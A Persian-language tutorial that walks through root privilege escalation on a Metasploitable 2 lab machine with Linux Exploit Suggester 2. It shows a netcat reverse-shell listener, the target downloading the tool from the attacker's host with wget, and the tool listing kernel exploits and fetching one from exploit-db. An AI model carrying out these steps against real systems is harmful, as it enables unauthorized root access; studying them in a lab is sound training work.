اکسپولیت کردن و گرفتن دسترسی root در لینوکس

گرفتن دسترسی root در لینوکس همیشه چالش برانگیز بوده است. در این آموزش یک ابزار را که در انجام این عمل به ما کمک می کند را معرفی و روند کار با آن را می بینیم.

Privilege escalation یا معادل آن به فارسی «ترفیع امتیازی» یکی از مهارت‌های اساسی است که یک هکر می‌تواند داشته باشد، که در موقعیت های واقعی تازه‌کار‌ها را از حرفه‌ای‌ها جدا می‌کند. با تغییرات رویکردی امنیتی که دائما در حال تغییر است و تعداد زیاد اکسپلویت‌ هایی که وجود دارد. از هر زاویه به این حمله نگاه کنیم کاری سخت به نظر می رسد. خوشبختانه، برخی از ابزارها می‌توانند به تسریع روند کار کمک کنند. Linux Exploit Suggester یکی از ابزار‌هایی است که در گرفتن دسترسی root به شما کمک می‌کند.

باید دقت داشت Privilege escalation در تعریف به عمل دستیابی به امتیازات یک کاربر دیگر در سیستم است که دو نوع افقی و عمودی دارد.

Privilege escalation افقی زمانی رخ می‌دهد، که مهاجم به حساب یک کاربر دیگر دسترسی پیدا می‌کند. به طور معمول با همان وضعیت و مجوزها‌ی خود مهاجم. این نوع Privilege escalation به مهاجم اجازه دسترسی به سیستم‌ها و داده‌های دیگر را می‌دهد، ولی به اندازه نوع عمودی آن خطرناک نیست.

Privilege escalation عمودی زمانی رخ می‌دهد، که یک مهاجم به حسابی با امتیازات بالا مانند حساب مدیر سیستم  دسترسی پیدا کند.

Privilege escalation، مخصوصا نوع عمودی آن، برای مهاجم بسیار مهم است، زیرا به مهاجم این امکان را می‌دهد، کارهایی را انجام دهد که یک کاربر عادی قادر به انجام آن‌ها نیست. بجز در سیستم‌هایی که پیکربندی ضعیف دارند، کاربران عادی، معمولاً نمی‌توانند کد مخربی را اجرا کنند و یا سیستم را به روش‌هایی که بتوان به نفع حمله استفاده کرد، پیکربندی کنند. به همین دلیل است که Privilege escalation برای گرفتن دسترسی کامل به یک هدف مهم است.

برای اینکه بتوانیم نحوه استفاده از Linux Exploit Suggester را با هم مرور کنیم نیاز است که یک سیستم آسیب پذیر داشته باشیم. همان طور که می دانید دهه ۲۰۰۰ میلادی نیست که سایت های هک شده را در یک تاپیک در انجمن به عنوان تارگت های تمرینی قرار دهیم به همین دلیل از ابزارهای مدرن استفاده خواهیم کرد که برای امروز از Metasploitable 2 استفاده خواهیم کرد. از Metasploitable 2 به عنوان هدف و از کالی لینوکس به عنوان دستگاه حمله کننده استفاده می کنیم.

مرحله 1:

نصب و اقدامات اولیه برای به خطر انداختن سیستم

در اولین قدم، باید Linux Exploit Suggester را از GitHub دریافت کنیم. اما مطمئنا در شرایط واقعی اتفاقی که رخ خواهد داد این است که شما نمی توانید با فرمان git کار کنید چرا که ممکن است نصب نشده باشد یا اصلا محدودیت های خاص دیگری در سیستم هدف اعمال شده باشد، بنابراین باید ابتدا آن را در سیستم خود داشته باشیم و بعداً آن را به هدف منتقل کنیم.ولی با استفاده از wget از طریق ترمینال می‌توانیم به صورت مستقیم فایل را منتقل کنیم:

~# wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl

--2020-06-03 12:15:58-- https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24780 (24K) [text/plain]
Saving to: ‘linux-exploit-suggester-2.pl’

linux-exploit-suggester-2.pl             100%[======================================================================================================================>] 24.20K --.-KB/s  in 0.03s

2020-06-03 15:15:58 (718 KB/s) - ‘linux-exploit-suggester-2.pl’ saved [24780/24780]

اولین قدم این است که به Shell دسترسی پیدا کنیم. تزریق فرمان (Command injection) همیشه گزینه جذابی بوده است. برای اینکه مطمئن شویم که در حال حاضر با چه کاربری در سیستم شناخته می شویم که قاعدتا www-data است و چه id متعلق به این کاربر است، طبق روش زیر عمل می کنیم:

~# nc -lvnp 4321

listening on [any] 4321 ...
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 36302
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

از اینجا به بعد، ما می‌خواهیم shell خود را به به طور کامل interactive TTY shell ارتقا دهیم، تا کنترل بیش‌تری داشته باشیم و بتوانیم از قابلیت هایی همچون تکمیل دستور (tab completion)، تاریخچه دستور‌ها (command history) و غیره استفاده کنیم. وقتی shell خود را ارتقا دادیم، می‌توانیم به یک دایرکتوری قابل استفاده برای همه (world-writable) برویم تا بتوانیم ابزار زیر را دریافت کرده و در نهایت آن را اجرا کنیم.

[email protected]:/var/www/dvwa/vulnerabilities/exec$ cd /dev/shm

مرحله 2:

انتقال اسکریپت به هدف

به دستگاه خود بر می‌گردیم، بهتر است نام اسکریپت را تغییر دهیم تا کوتاه‌تر شود که راحت تر از آن بتوانیم استفاده کنیم.

~# mv linux-exploit-suggester-2.pl les2.pl

اکنون می‌توانیم اسکریپت را به SimpleHTTPServer پایتون بدهیم. برای مشخص کردن حالت وب سرور از سوئیچ -m استفاده کنید: این کار هر محتوایی را که در دایرکتوری HTTP روی پورت 8000 است را روی اینترنت می برد (قابل دسترس می نماید).

~# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

به هدف خود بر‌می‌گردیم. ما می‌توانیم دوباره از wget برای گرفتن اسکریپت از دستگاه خودمان استفاده کنیم:

[email protected]:/dev/shm$ wget http://10.10.0.1:8000/les2.pl

--16:43:17-- http://10.10.0.1:8000/les2.pl
      => `les2.pl'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24,780 (24K) [text/x-perl]

100%[=========================================================================================================================================================================>] 24,780    --.--K/s

16:43:18 (70.47 MB/s) - `les2.pl' saved [24780/24780]

پس از اتمام این کار، می‌توانیم سرور پایتون را از بین ببریم.اکنون می‌توانیم به مجوزهای فعلی اسکریپت خود که به تازگی منتقل کردیم نگاهی بیندازیم:

[email protected]:/dev/shm$ ls -la

total 28
drwxrwxrwt 2 root   root    60 Jan 19 13:43 .
drwxr-xr-x 13 root   root   13480 Jan 19 13:28 ..
-rw-r--r-- 1 www-data www-data 24780 Jun 03 2020 les2.pl

می‌بینیم که در این مرحله اسکریپت فقط قابل خواندن است، بنابراین از دستور Chmod برای قابل اجرا شدن اسکریپت استفاده می‌کنیم:

[email protected]:/dev/shm$ chmod +x les2.pl

سرانجام ، آماده اجرای اسکریپت خواهیم بود.

مرحله 3:

اجرا پیشنهاد‌ دهنده اکسپلویت لینوکس

از آنجا که اسکریپت ما قابل اجراست، می‌توانیم از دستور نقطه اسلش ( ./ ) برای اجرای Linux Exploit Suggester استفاده کنیم. برای دیدن منوی راهنما و مثال های استفاده از سویچ -h استفاده می شود:

[email protected]:/dev/shm$ ./les2.pl -h

 #############################
  Linux Exploit Suggester 2
 #############################

 Usage: ./les2.pl [-h] [-k kernel] [-d]

 [-h] Help (this message)
 [-k] Kernel number (eg. 2.6.28)
 [-d] Open exploit download menu

 You can also provide a partial kernel version (eg. 2.4)
 to see all exploits available.

ابتدایی ترین روش استفاده از این ابزار، اجرای آن بدون هیچ گزینه ای است:

[email protected]:/dev/shm$ ./les2.pl

 #############################
  Linux Exploit Suggester 2
 #############################

 Local Kernel: 2.6.24
 Searching 72 exploits...

 Possible Exploits
 [1] american-sign-language
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408
 [2] can_bcm
   CVE-2010-2959
   Source: http://www.exploit-db.com/exploits/14814
 [3] dirty_cow
   CVE-2016-5195
   Source: http://www.exploit-db.com/exploits/40616
 [4] do_pages_move
   Alt: sieve    CVE-2010-0415
   Source: Spenders Enlightenment
 [5] exploit_x
   CVE-2018-14665
   Source: http://www.exploit-db.com/exploits/45697
 [6] half_nelson1
   Alt: econet    CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/17787
 [7] half_nelson2
   Alt: econet    CVE-2010-3850
   Source: http://www.exploit-db.com/exploits/17787
 [8] half_nelson3
   Alt: econet    CVE-2010-4073
   Source: http://www.exploit-db.com/exploits/17787
 [9] msr
   CVE-2013-0268
   Source: http://www.exploit-db.com/exploits/27297
 [10] pipe.c_32bit
   CVE-2009-3547
   Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
 [11] pktcdvd
   CVE-2010-3437
   Source: http://www.exploit-db.com/exploits/15150
 [12] reiserfs
   CVE-2010-1146
   Source: http://www.exploit-db.com/exploits/12130
 [13] sock_sendpage
   Alt: wunderbar_emporium    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9435
 [14] sock_sendpage2
   Alt: proto_ops    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9436
 [15] video4linux
   CVE-2010-3081
   Source: http://www.exploit-db.com/exploits/15024
 [16] vmsplice1
   Alt: jessica biel    CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5092
 [17] vmsplice2
   Alt: diane_lane    CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5093

Linux Exploit Suggester با شناسایی نسخه کرنل و مقایسه آن با لیستی از اکسپلویت‌های احتمالی کار می‌کند. در بالا می‌توانیم تعدادی از اکسپلویت‌های بالقوه را با ذکر نام، شماره CVE و لینکی به منبع‌‌شان مشاهده کنیم. همچنین می‌توانیم با استفاده از سویچ -K نسخه کرنل را به صورت دستی مشخص کنیم. برای مطمئن شدن می تواین نسخه کرنل را با دستور uname -r بررسی کنیم:

[email protected]:/dev/shm$ uname -r

2.6.24-16-server

به جای استفاده از شماره دقیق نسخه، می‌توانیم آن را به 2.6 کوتاه کنیم، زیرا سیستم‌ها اغلب ممکن است در برابر اکسپلویت‌های کمی قدیمی نیز آسیب پذیر باشند:

[email protected]:/dev/shm$ ./les2.pl -k 2.6

 #############################
  Linux Exploit Suggester 2
 #############################

 Local Kernel: 2.6
 Searching 72 exploits...

 Possible Exploits
 [1] american-sign-language (2.6.0)
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408
 [2] can_bcm (2.6.18)
   CVE-2010-2959
   Source: http://www.exploit-db.com/exploits/14814
 [3] caps_to_root (2.6.34)
   CVE-n/a
   Source: http://www.exploit-db.com/exploits/15916
 [4] dirty_cow (2.6.22)
   CVE-2016-5195
   Source: http://www.exploit-db.com/exploits/40616
 [5] do_pages_move (2.6.18)
   Alt: sieve    CVE-2010-0415
   Source: Spenders Enlightenment
 [6] elfcd (2.6.12)
 [7] exit_notify (2.6.25)
   Source: http://www.exploit-db.com/exploits/8369
 [8] exp.sh (2.6.9)
 [9] exploit_x (2.6.22)
   CVE-2018-14665
   Source: http://www.exploit-db.com/exploits/45697
 [10] ftrex (2.6.11)
   CVE-2008-4210
   Source: http://www.exploit-db.com/exploits/6851
 [11] h00lyshit (2.6.8)
   CVE-2006-3626
   Source: http://www.exploit-db.com/exploits/2013
 [12] half_nelson1 (2.6.0)
   Alt: econet    CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/17787
 [13] half_nelson2 (2.6.0)
   Alt: econet    CVE-2010-3850
   Source: http://www.exploit-db.com/exploits/17787
 [14] half_nelson3 (2.6.0)
   Alt: econet    CVE-2010-4073
   Source: http://www.exploit-db.com/exploits/17787
 [15] kdump (2.6.13)
 [16] krad (2.6.5)
 [17] krad3 (2.6.5)
   Source: http://exploit-db.com/exploits/1397
 [18] local26 (2.6.13)
 [19] memodipper (2.6.39)
   CVE-2012-0056
   Source: http://www.exploit-db.com/exploits/18411
 [20] msr (2.6.18)
   CVE-2013-0268
   Source: http://www.exploit-db.com/exploits/27297
 [21] newsmp (2.6)
 [22] ong_bak (2.6.5)
 [23] pipe.c_32bit (2.6.15)
   CVE-2009-3547
   Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
 [24] pktcdvd (2.6.0)
   CVE-2010-3437
   Source: http://www.exploit-db.com/exploits/15150
 [25] prctl (2.6.13)
   Source: http://www.exploit-db.com/exploits/2004
 [26] prctl2 (2.6.13)
   Source: http://www.exploit-db.com/exploits/2005
 [27] prctl3 (2.6.13)
   Source: http://www.exploit-db.com/exploits/2006
 [28] prctl4 (2.6.13)
   Source: http://www.exploit-db.com/exploits/2011
 [29] ptrace_kmod2 (2.6.26)
   Alt: ia32syscall,robert_you_suck    CVE-2010-3301
   Source: http://www.exploit-db.com/exploits/15023
 [30] pwned (2.6.11)
 [31] py2 (2.6.9)
 [32] raptor_prctl (2.6.13)
   CVE-2006-2451
   Source: http://www.exploit-db.com/exploits/2031
 [33] rawmodePTY (2.6.31)
   CVE-2014-0196
   Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
 [34] rds (2.6.30)
   CVE-2010-3904
   Source: http://www.exploit-db.com/exploits/15285
 [35] reiserfs (2.6.18)
   CVE-2010-1146
   Source: http://www.exploit-db.com/exploits/12130
 [36] sctp (2.6.26)
   CVE-2008-4113
 [37] semtex (2.6.37)
   CVE-2013-2094
   Source: http://www.exploit-db.com/exploits/25444
 [38] sock_sendpage (2.6.0)
   Alt: wunderbar_emporium    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9435
 [39] sock_sendpage2 (2.6.0)
   Alt: proto_ops    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9436
 [40] stackgrow2 (2.6.10)
 [41] udev (2.6.25)
   Alt: udev <1.4.1    CVE-2009-1185
   Source: http://www.exploit-db.com/exploits/8478
 [42] udp_sendmsg_32bit (2.6.1)
   CVE-2009-2698
   Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
 [43] uselib24 (2.6.10)
 [44] vconsole (2.6)
   CVE-2009-1046
 [45] video4linux (2.6.0)
   CVE-2010-3081
   Source: http://www.exploit-db.com/exploits/15024
 [46] vmsplice1 (2.6.17)
   Alt: jessica biel    CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5092
 [47] vmsplice2 (2.6.23)
   Alt: diane_lane    CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5093

می‌ببینیم که این کار، تعداد بیشتری از اکسپلویت‌های احتمالی را به ما نمایش می دهد. آخرین گزینه پیشنهاد‌دهنده اکسپلویت لینوکس امکان دانلود خودکار اسکریپت‌های هر اکسپلویت برای هر آسیب پذیری است. برای فعال کردن این گزینه از سویچ -d استفاده می کنیم:

[email protected]:/dev/shm$ ./les2.pl -k 2.6 -d

 #############################
  Linux Exploit Suggester 2
 #############################

 Local Kernel: 2.6
 Searching 72 exploits...

 Possible Exploits
 [1] american-sign-language (2.6.0)
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408
 [2] can_bcm (2.6.18)
   CVE-2010-2959
   Source: http://www.exploit-db.com/exploits/14814
 [3] caps_to_root (2.6.34)
   CVE-n/a
   Source: http://www.exploit-db.com/exploits/15916
 [4] dirty_cow (2.6.22)
   CVE-2016-5195
   Source: http://www.exploit-db.com/exploits/40616
 [5] do_pages_move (2.6.18)
   Alt: sieve    CVE-2010-0415
   Source: Spenders Enlightenment
 [6] elfcd (2.6.12)
 [7] exit_notify (2.6.25)
   Source: http://www.exploit-db.com/exploits/8369
 [8] exp.sh (2.6.9)
 [9] exploit_x (2.6.22)
   CVE-2018-14665
   Source: http://www.exploit-db.com/exploits/45697
 [10] ftrex (2.6.11)
   CVE-2008-4210
   Source: http://www.exploit-db.com/exploits/6851
 [11] h00lyshit (2.6.8)
   CVE-2006-3626
   Source: http://www.exploit-db.com/exploits/2013
 [12] half_nelson1 (2.6.0)
   Alt: econet    CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/17787
 [13] half_nelson2 (2.6.0)
   Alt: econet    CVE-2010-3850
   Source: http://www.exploit-db.com/exploits/17787
 [14] half_nelson3 (2.6.0)
   Alt: econet    CVE-2010-4073
   Source: http://www.exploit-db.com/exploits/17787
 [15] kdump (2.6.13)
 [16] krad (2.6.5)
 [17] krad3 (2.6.5)
   Source: http://exploit-db.com/exploits/1397
 [18] local26 (2.6.13)
 [19] memodipper (2.6.39)
   CVE-2012-0056
   Source: http://www.exploit-db.com/exploits/18411
 [20] msr (2.6.18)
   CVE-2013-0268
   Source: http://www.exploit-db.com/exploits/27297
 [21] newsmp (2.6)
 [22] ong_bak (2.6.5)
 [23] pipe.c_32bit (2.6.15)
   CVE-2009-3547
   Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
 [24] pktcdvd (2.6.0)
   CVE-2010-3437
   Source: http://www.exploit-db.com/exploits/15150
 [25] prctl (2.6.13)
   Source: http://www.exploit-db.com/exploits/2004
 [26] prctl2 (2.6.13)
   Source: http://www.exploit-db.com/exploits/2005
 [27] prctl3 (2.6.13)
   Source: http://www.exploit-db.com/exploits/2006
 [28] prctl4 (2.6.13)
   Source: http://www.exploit-db.com/exploits/2011
 [29] ptrace_kmod2 (2.6.26)
   Alt: ia32syscall,robert_you_suck    CVE-2010-3301
   Source: http://www.exploit-db.com/exploits/15023
 [30] pwned (2.6.11)
 [31] py2 (2.6.9)
 [32] raptor_prctl (2.6.13)
   CVE-2006-2451
   Source: http://www.exploit-db.com/exploits/2031
 [33] rawmodePTY (2.6.31)
   CVE-2014-0196
   Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
 [34] rds (2.6.30)
   CVE-2010-3904
   Source: http://www.exploit-db.com/exploits/15285
 [35] reiserfs (2.6.18)
   CVE-2010-1146
   Source: http://www.exploit-db.com/exploits/12130
 [36] sctp (2.6.26)
   CVE-2008-4113
 [37] semtex (2.6.37)
   CVE-2013-2094
   Source: http://www.exploit-db.com/exploits/25444
 [38] sock_sendpage (2.6.0)
   Alt: wunderbar_emporium    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9435
 [39] sock_sendpage2 (2.6.0)
   Alt: proto_ops    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9436
 [40] stackgrow2 (2.6.10)
 [41] udev (2.6.25)
   Alt: udev <1.4.1    CVE-2009-1185
   Source: http://www.exploit-db.com/exploits/8478
 [42] udp_sendmsg_32bit (2.6.1)
   CVE-2009-2698
   Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
 [43] uselib24 (2.6.10)
 [44] vconsole (2.6)
   CVE-2009-1046
 [45] video4linux (2.6.0)
   CVE-2010-3081
   Source: http://www.exploit-db.com/exploits/15024
 [46] vmsplice1 (2.6.17)
   Alt: jessica biel    CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5092
 [47] vmsplice2 (2.6.23)
   Alt: diane_lane    CVE-2008-0600
   Source: http://www.exploit-db.com/exploits/5093

 Exploit Download
 (Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
 Select exploits to download:

پس از تعیین اکسپلویت، به ما گزینه ای برای دانلود همه اکسپلویت ها یا اکسپلویت اختصاصی خودمان، نمایش داده می شود. برای مثال، اگر بخواهیم اکسپلویت udev را دانلود کنیم، به سادگی شناسه مربوطه را وارد می‌کنیم:

Exploit Download
 (Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
 Select exploits to download: 41

 Downloading https://www.exploit-db.com/raw/8478 -> exploit_udev

در نظر داشته باشید که این ویژگی به یک اتصال فعال به اینترنت نیاز دارد، بنابراین اگر دسترسی به هر طریقی محدود شود، کار آن مختل خواهد شد. با این حال، Linux Exploit Suggester اجرای دقیق Exploit روی هدف را بسیار ساده  می‌کند.

نکته: مطمئنا روش ها و ابزارهای دیگه ای برای افزایش سطح دسترسی و گرفتن دسترسی root وجود دارد ولی هدف از این مقاله نحوه کارکرد کلی و انجام این نوع از حملات می باشد.